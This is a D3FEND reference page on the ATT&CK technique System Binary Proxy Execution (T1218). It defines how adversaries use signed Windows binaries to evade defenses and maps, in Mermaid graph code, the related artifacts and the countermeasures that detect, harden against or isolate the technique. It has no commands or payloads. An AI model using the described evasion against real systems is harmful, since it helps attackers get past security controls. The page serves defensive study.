Esc
System Binary Proxy Execution - T1218
(ATT&CK® Technique)
Definition
Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system. Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.
D3FEND Inferred Relationships
Browse the D3FEND knowledge graph by clicking on the nodes below.
graph LR;
T1218["System Binary Proxy Execution"] --> |invokes| CreateProcess["Create Process"]; class T1218 OffensiveTechniqueNode;
class CreateProcess ArtifactNode; click CreateProcess href "/dao/artifact/d3f:CreateProcess";
click T1218 href "/offensive-technique/attack/T1218/"; click CreateProcess href "/dao/artifact/d3f:CreateProcess"; T1218["System Binary Proxy Execution"] --> |invokes| CreateThread["Create Thread"]; class T1218 OffensiveTechniqueNode;
class CreateThread ArtifactNode; click CreateThread href "/dao/artifact/d3f:CreateThread";
click T1218 href "/offensive-technique/attack/T1218/"; click CreateThread href "/dao/artifact/d3f:CreateThread"; T1218["System Binary Proxy Execution"] --> |executes| Command["Command"]; class T1218 OffensiveTechniqueNode;
class Command ArtifactNode; click Command href "/dao/artifact/d3f:Command";
click T1218 href "/offensive-technique/attack/T1218/"; click Command href "/dao/artifact/d3f:Command"; T1218["System Binary Proxy Execution"] --> |may-add| Software["Software"]; class T1218 OffensiveTechniqueNode;
class Software ArtifactNode; click Software href "/dao/artifact/d3f:Software";
click T1218 href "/offensive-technique/attack/T1218/"; click Software href "/dao/artifact/d3f:Software"; T1218["System Binary Proxy Execution"] --> |may-modify| SystemConfigurationDatabase["System Configuration Database"]; class T1218 OffensiveTechniqueNode;
class SystemConfigurationDatabase ArtifactNode; click SystemConfigurationDatabase href "/dao/artifact/d3f:SystemConfigurationDatabase";
click T1218 href "/offensive-technique/attack/T1218/"; click SystemConfigurationDatabase href "/dao/artifact/d3f:SystemConfigurationDatabase"; T1218["System Binary Proxy Execution"] --> |may-produce| NetworkTraffic["Network Traffic"]; class T1218 OffensiveTechniqueNode;
class NetworkTraffic ArtifactNode; click NetworkTraffic href "/dao/artifact/d3f:NetworkTraffic";
click T1218 href "/offensive-technique/attack/T1218/"; click NetworkTraffic href "/dao/artifact/d3f:NetworkTraffic"; T1218["System Binary Proxy Execution"] --> |modifies| ProcessSegment["Process Segment"]; class T1218 OffensiveTechniqueNode;
class ProcessSegment ArtifactNode; click ProcessSegment href "/dao/artifact/d3f:ProcessSegment";
click T1218 href "/offensive-technique/attack/T1218/"; click ProcessSegment href "/dao/artifact/d3f:ProcessSegment"; T1218["System Binary Proxy Execution"] --> |invokes| CreateFile["Create File"]; class T1218 OffensiveTechniqueNode;
class CreateFile ArtifactNode; click CreateFile href "/dao/artifact/d3f:CreateFile";
click T1218 href "/offensive-technique/attack/T1218/"; click CreateFile href "/dao/artifact/d3f:CreateFile"; T1218["System Binary Proxy Execution"] --> |may-modify| SystemConfigurationDatabaseRecord["System Configuration Database Record"]; class T1218 OffensiveTechniqueNode;
class SystemConfigurationDatabaseRecord ArtifactNode; click SystemConfigurationDatabaseRecord href "/dao/artifact/d3f:SystemConfigurationDatabaseRecord";
click T1218 href "/offensive-technique/attack/T1218/"; click SystemConfigurationDatabaseRecord href "/dao/artifact/d3f:SystemConfigurationDatabaseRecord"; T1218["System Binary Proxy Execution"] --> |loads| SharedLibraryFile["Shared Library File"]; class T1218 OffensiveTechniqueNode;
class SharedLibraryFile ArtifactNode; click SharedLibraryFile href "/dao/artifact/d3f:SharedLibraryFile";
click T1218 href "/offensive-technique/attack/T1218/"; click SharedLibraryFile href "/dao/artifact/d3f:SharedLibraryFile"; T1218["System Binary Proxy Execution"] --> |interprets| MicrosoftHTMLApplication["Microsoft HTML Application"]; class T1218 OffensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode; click MicrosoftHTMLApplication href "/dao/artifact/d3f:MicrosoftHTMLApplication";
click T1218 href "/offensive-technique/attack/T1218/"; click MicrosoftHTMLApplication href "/dao/artifact/d3f:MicrosoftHTMLApplication"; DecoyFile["Decoy File"] -->
| spoofs | SharedLibraryFile["Shared Library File"];
DecoyFile["Decoy File"] -.->
| may-deceive | T1218["System Binary Proxy Execution"] ;
class DecoyFile DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click DecoyFile href "/technique/d3f:DecoyFile"; DecoyFile["Decoy File"] -->
| spoofs | MicrosoftHTMLApplication["Microsoft HTML Application"];
class DecoyFile DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click DecoyFile href "/technique/d3f:DecoyFile"; EmulatedFileAnalysis["Emulated File Analysis"] -->
| analyzes | MicrosoftHTMLApplication["Microsoft HTML Application"];
EmulatedFileAnalysis["Emulated File Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class EmulatedFileAnalysis DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click EmulatedFileAnalysis href "/technique/d3f:EmulatedFileAnalysis"; DynamicAnalysis["Dynamic Analysis"] -->
| analyzes | MicrosoftHTMLApplication["Microsoft HTML Application"];
DynamicAnalysis["Dynamic Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class DynamicAnalysis DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click DynamicAnalysis href "/technique/d3f:DynamicAnalysis"; PerHostDownload-UploadRatioAnalysis["Per Host Download-Upload Ratio Analysis"] -->
| analyzes | NetworkTraffic["Network Traffic"];
PerHostDownload-UploadRatioAnalysis["Per Host Download-Upload Ratio Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class PerHostDownload-UploadRatioAnalysis DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click PerHostDownload-UploadRatioAnalysis href "/technique/d3f:PerHostDownload-UploadRatioAnalysis"; ProtocolMetadataAnomalyDetection["Protocol Metadata Anomaly Detection"] -->
| analyzes | NetworkTraffic["Network Traffic"];
ProtocolMetadataAnomalyDetection["Protocol Metadata Anomaly Detection"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class ProtocolMetadataAnomalyDetection DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click ProtocolMetadataAnomalyDetection href "/technique/d3f:ProtocolMetadataAnomalyDetection"; Client-serverPayloadProfiling["Client-server Payload Profiling"] -->
| analyzes | NetworkTraffic["Network Traffic"];
Client-serverPayloadProfiling["Client-server Payload Profiling"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class Client-serverPayloadProfiling DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click Client-serverPayloadProfiling href "/technique/d3f:Client-serverPayloadProfiling"; NetworkTrafficCommunityDeviation["Network Traffic Community Deviation"] -->
| analyzes | NetworkTraffic["Network Traffic"];
NetworkTrafficCommunityDeviation["Network Traffic Community Deviation"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class NetworkTrafficCommunityDeviation DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click NetworkTrafficCommunityDeviation href "/technique/d3f:NetworkTrafficCommunityDeviation"; NetworkTrafficSignatureAnalysis["Network Traffic Signature Analysis"] -->
| analyzes | NetworkTraffic["Network Traffic"];
NetworkTrafficSignatureAnalysis["Network Traffic Signature Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class NetworkTrafficSignatureAnalysis DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click NetworkTrafficSignatureAnalysis href "/technique/d3f:NetworkTrafficSignatureAnalysis"; RemoteTerminalSessionDetection["Remote Terminal Session Detection"] -->
| analyzes | NetworkTraffic["Network Traffic"];
RemoteTerminalSessionDetection["Remote Terminal Session Detection"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class RemoteTerminalSessionDetection DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click RemoteTerminalSessionDetection href "/technique/d3f:RemoteTerminalSessionDetection"; SystemCallAnalysis["System Call Analysis"] -->
| analyzes | CreateThread["Create Thread"];
SystemCallAnalysis["System Call Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class SystemCallAnalysis DefensiveTechniqueNode;
class CreateThread ArtifactNode;
click SystemCallAnalysis href "/technique/d3f:SystemCallAnalysis"; SystemCallAnalysis["System Call Analysis"] -->
| analyzes | CreateProcess["Create Process"];
class SystemCallAnalysis DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click SystemCallAnalysis href "/technique/d3f:SystemCallAnalysis"; ProcessSpawnAnalysis["Process Spawn Analysis"] -->
| analyzes | CreateProcess["Create Process"];
ProcessSpawnAnalysis["Process Spawn Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class ProcessSpawnAnalysis DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click ProcessSpawnAnalysis href "/technique/d3f:ProcessSpawnAnalysis"; SystemCallAnalysis["System Call Analysis"] -->
| analyzes | CreateFile["Create File"];
class SystemCallAnalysis DefensiveTechniqueNode;
class CreateFile ArtifactNode;
click SystemCallAnalysis href "/technique/d3f:SystemCallAnalysis"; FileIntegrityMonitoring["File Integrity Monitoring"] -->
| analyzes | SharedLibraryFile["Shared Library File"];
FileIntegrityMonitoring["File Integrity Monitoring"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class FileIntegrityMonitoring DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click FileIntegrityMonitoring href "/technique/d3f:FileIntegrityMonitoring"; FileIntegrityMonitoring["File Integrity Monitoring"] -->
| analyzes | MicrosoftHTMLApplication["Microsoft HTML Application"];
class FileIntegrityMonitoring DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click FileIntegrityMonitoring href "/technique/d3f:FileIntegrityMonitoring"; UserGeolocationLogonPatternAnalysis["User Geolocation Logon Pattern Analysis"] -->
| analyzes | NetworkTraffic["Network Traffic"];
UserGeolocationLogonPatternAnalysis["User Geolocation Logon Pattern Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class UserGeolocationLogonPatternAnalysis DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click UserGeolocationLogonPatternAnalysis href "/technique/d3f:UserGeolocationLogonPatternAnalysis"; FileEviction["File Eviction"] -->
| deletes | SharedLibraryFile["Shared Library File"];
FileEviction["File Eviction"] -.->
| may-evict | T1218["System Binary Proxy Execution"] ;
class FileEviction DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click FileEviction href "/technique/d3f:FileEviction"; FileEviction["File Eviction"] -->
| deletes | MicrosoftHTMLApplication["Microsoft HTML Application"];
class FileEviction DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click FileEviction href "/technique/d3f:FileEviction"; FileEncryption["File Encryption"] -->
| encrypts | MicrosoftHTMLApplication["Microsoft HTML Application"];
FileEncryption["File Encryption"] -.->
| may-harden | T1218["System Binary Proxy Execution"] ;
class FileEncryption DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click FileEncryption href "/technique/d3f:FileEncryption"; FileEncryption["File Encryption"] -->
| encrypts | SharedLibraryFile["Shared Library File"];
class FileEncryption DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click FileEncryption href "/technique/d3f:FileEncryption"; SystemConfigurationPermissions["System Configuration Permissions"] -->
| restricts | SystemConfigurationDatabase["System Configuration Database"];
SystemConfigurationPermissions["System Configuration Permissions"] -.->
| may-harden | T1218["System Binary Proxy Execution"] ;
class SystemConfigurationPermissions DefensiveTechniqueNode;
class SystemConfigurationDatabase ArtifactNode;
click SystemConfigurationPermissions href "/technique/d3f:SystemConfigurationPermissions"; SoftwareUpdate["Software Update"] -->
| updates | Software["Software"];
SoftwareUpdate["Software Update"] -.->
| may-harden | T1218["System Binary Proxy Execution"] ;
class SoftwareUpdate DefensiveTechniqueNode;
class Software ArtifactNode;
click SoftwareUpdate href "/technique/d3f:SoftwareUpdate"; ProcessSegmentExecutionPrevention["Process Segment Execution Prevention"] -->
| neutralizes | ProcessSegment["Process Segment"];
ProcessSegmentExecutionPrevention["Process Segment Execution Prevention"] -.->
| may-harden | T1218["System Binary Proxy Execution"] ;
class ProcessSegmentExecutionPrevention DefensiveTechniqueNode;
class ProcessSegment ArtifactNode;
click ProcessSegmentExecutionPrevention href "/technique/d3f:ProcessSegmentExecutionPrevention"; SegmentAddressOffsetRandomization["Segment Address Offset Randomization"] -->
| obfuscates | ProcessSegment["Process Segment"];
SegmentAddressOffsetRandomization["Segment Address Offset Randomization"] -.->
| may-harden | T1218["System Binary Proxy Execution"] ;
class SegmentAddressOffsetRandomization DefensiveTechniqueNode;
class ProcessSegment ArtifactNode;
click SegmentAddressOffsetRandomization href "/technique/d3f:SegmentAddressOffsetRandomization"; ExecutableAllowlisting["Executable Allowlisting"] -->
| filters | CreateProcess["Create Process"];
ExecutableAllowlisting["Executable Allowlisting"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class ExecutableAllowlisting DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click ExecutableAllowlisting href "/technique/d3f:ExecutableAllowlisting"; ExecutableDenylisting["Executable Denylisting"] -->
| filters | CreateProcess["Create Process"];
ExecutableDenylisting["Executable Denylisting"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class ExecutableDenylisting DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click ExecutableDenylisting href "/technique/d3f:ExecutableDenylisting"; Hardware-basedProcessIsolation["Hardware-based Process Isolation"] -->
| restricts | CreateProcess["Create Process"];
Hardware-basedProcessIsolation["Hardware-based Process Isolation"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class Hardware-basedProcessIsolation DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click Hardware-basedProcessIsolation href "/technique/d3f:Hardware-basedProcessIsolation"; LocalFilePermissions["Local File Permissions"] -->
| restricts | MicrosoftHTMLApplication["Microsoft HTML Application"];
LocalFilePermissions["Local File Permissions"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class LocalFilePermissions DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click LocalFilePermissions href "/technique/d3f:LocalFilePermissions"; LocalFilePermissions["Local File Permissions"] -->
| restricts | SharedLibraryFile["Shared Library File"];
class LocalFilePermissions DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click LocalFilePermissions href "/technique/d3f:LocalFilePermissions"; NetworkTrafficFiltering["Network Traffic Filtering"] -->
| filters | NetworkTraffic["Network Traffic"];
NetworkTrafficFiltering["Network Traffic Filtering"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class NetworkTrafficFiltering DefensiveTechniqueNode;
class NetworkTraffic ArtifactNode;
click NetworkTrafficFiltering href "/technique/d3f:NetworkTrafficFiltering"; SystemCallFiltering["System Call Filtering"] -->
| filters | CreateThread["Create Thread"];
SystemCallFiltering["System Call Filtering"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class SystemCallFiltering DefensiveTechniqueNode;
class CreateThread ArtifactNode;
click SystemCallFiltering href "/technique/d3f:SystemCallFiltering"; SystemCallFiltering["System Call Filtering"] -->
| filters | CreateFile["Create File"];
class SystemCallFiltering DefensiveTechniqueNode;
class CreateFile ArtifactNode;
click SystemCallFiltering href "/technique/d3f:SystemCallFiltering"; SystemCallFiltering["System Call Filtering"] -->
| filters | CreateProcess["Create Process"];
class SystemCallFiltering DefensiveTechniqueNode;
class CreateProcess ArtifactNode;
click SystemCallFiltering href "/technique/d3f:SystemCallFiltering"; RestoreSoftware["Restore Software"] -->
| restores | Software["Software"];
RestoreSoftware["Restore Software"] -.->
| may-restore | T1218["System Binary Proxy Execution"] ;
class RestoreSoftware DefensiveTechniqueNode;
class Software ArtifactNode;
click RestoreSoftware href "/technique/d3f:RestoreSoftware"; RestoreFile["Restore File"] -->
| restores | MicrosoftHTMLApplication["Microsoft HTML Application"];
RestoreFile["Restore File"] -.->
| may-restore | T1218["System Binary Proxy Execution"] ;
class RestoreFile DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click RestoreFile href "/technique/d3f:RestoreFile"; RestoreDatabase["Restore Database"] -->
| restores | SystemConfigurationDatabase["System Configuration Database"];
RestoreDatabase["Restore Database"] -.->
| may-restore | T1218["System Binary Proxy Execution"] ;
class RestoreDatabase DefensiveTechniqueNode;
class SystemConfigurationDatabase ArtifactNode;
click RestoreDatabase href "/technique/d3f:RestoreDatabase"; RestoreFile["Restore File"] -->
| restores | SharedLibraryFile["Shared Library File"];
class RestoreFile DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click RestoreFile href "/technique/d3f:RestoreFile"; RestoreConfiguration["Restore Configuration"] -->
| restores | SystemConfigurationDatabaseRecord["System Configuration Database Record"];
RestoreConfiguration["Restore Configuration"] -.->
| may-restore | T1218["System Binary Proxy Execution"] ;
class RestoreConfiguration DefensiveTechniqueNode;
class SystemConfigurationDatabaseRecord ArtifactNode;
click RestoreConfiguration href "/technique/d3f:RestoreConfiguration"; FileAnalysis["File Analysis"] -->
| analyzes | SharedLibraryFile["Shared Library File"];
FileAnalysis["File Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class FileAnalysis DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click FileAnalysis href "/technique/d3f:FileAnalysis"; FileAnalysis["File Analysis"] -->
| analyzes | MicrosoftHTMLApplication["Microsoft HTML Application"];
class FileAnalysis DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click FileAnalysis href "/technique/d3f:FileAnalysis"; FileCreationAnalysis["File Creation Analysis"] -->
| analyzes | CreateFile["Create File"];
FileCreationAnalysis["File Creation Analysis"] -.->
| may-detect | T1218["System Binary Proxy Execution"] ;
class FileCreationAnalysis DefensiveTechniqueNode;
class CreateFile ArtifactNode;
click FileCreationAnalysis href "/technique/d3f:FileCreationAnalysis"; RemoteFileAccessMediation["Remote File Access Mediation"] -->
| isolates | MicrosoftHTMLApplication["Microsoft HTML Application"];
RemoteFileAccessMediation["Remote File Access Mediation"] -.->
| may-isolate | T1218["System Binary Proxy Execution"] ;
class RemoteFileAccessMediation DefensiveTechniqueNode;
class MicrosoftHTMLApplication ArtifactNode;
click RemoteFileAccessMediation href "/technique/d3f:RemoteFileAccessMediation"; RemoteFileAccessMediation["Remote File Access Mediation"] -->
| isolates | SharedLibraryFile["Shared Library File"];
class RemoteFileAccessMediation DefensiveTechniqueNode;
class SharedLibraryFile ArtifactNode;
click RemoteFileAccessMediation href "/technique/d3f:RemoteFileAccessMediation";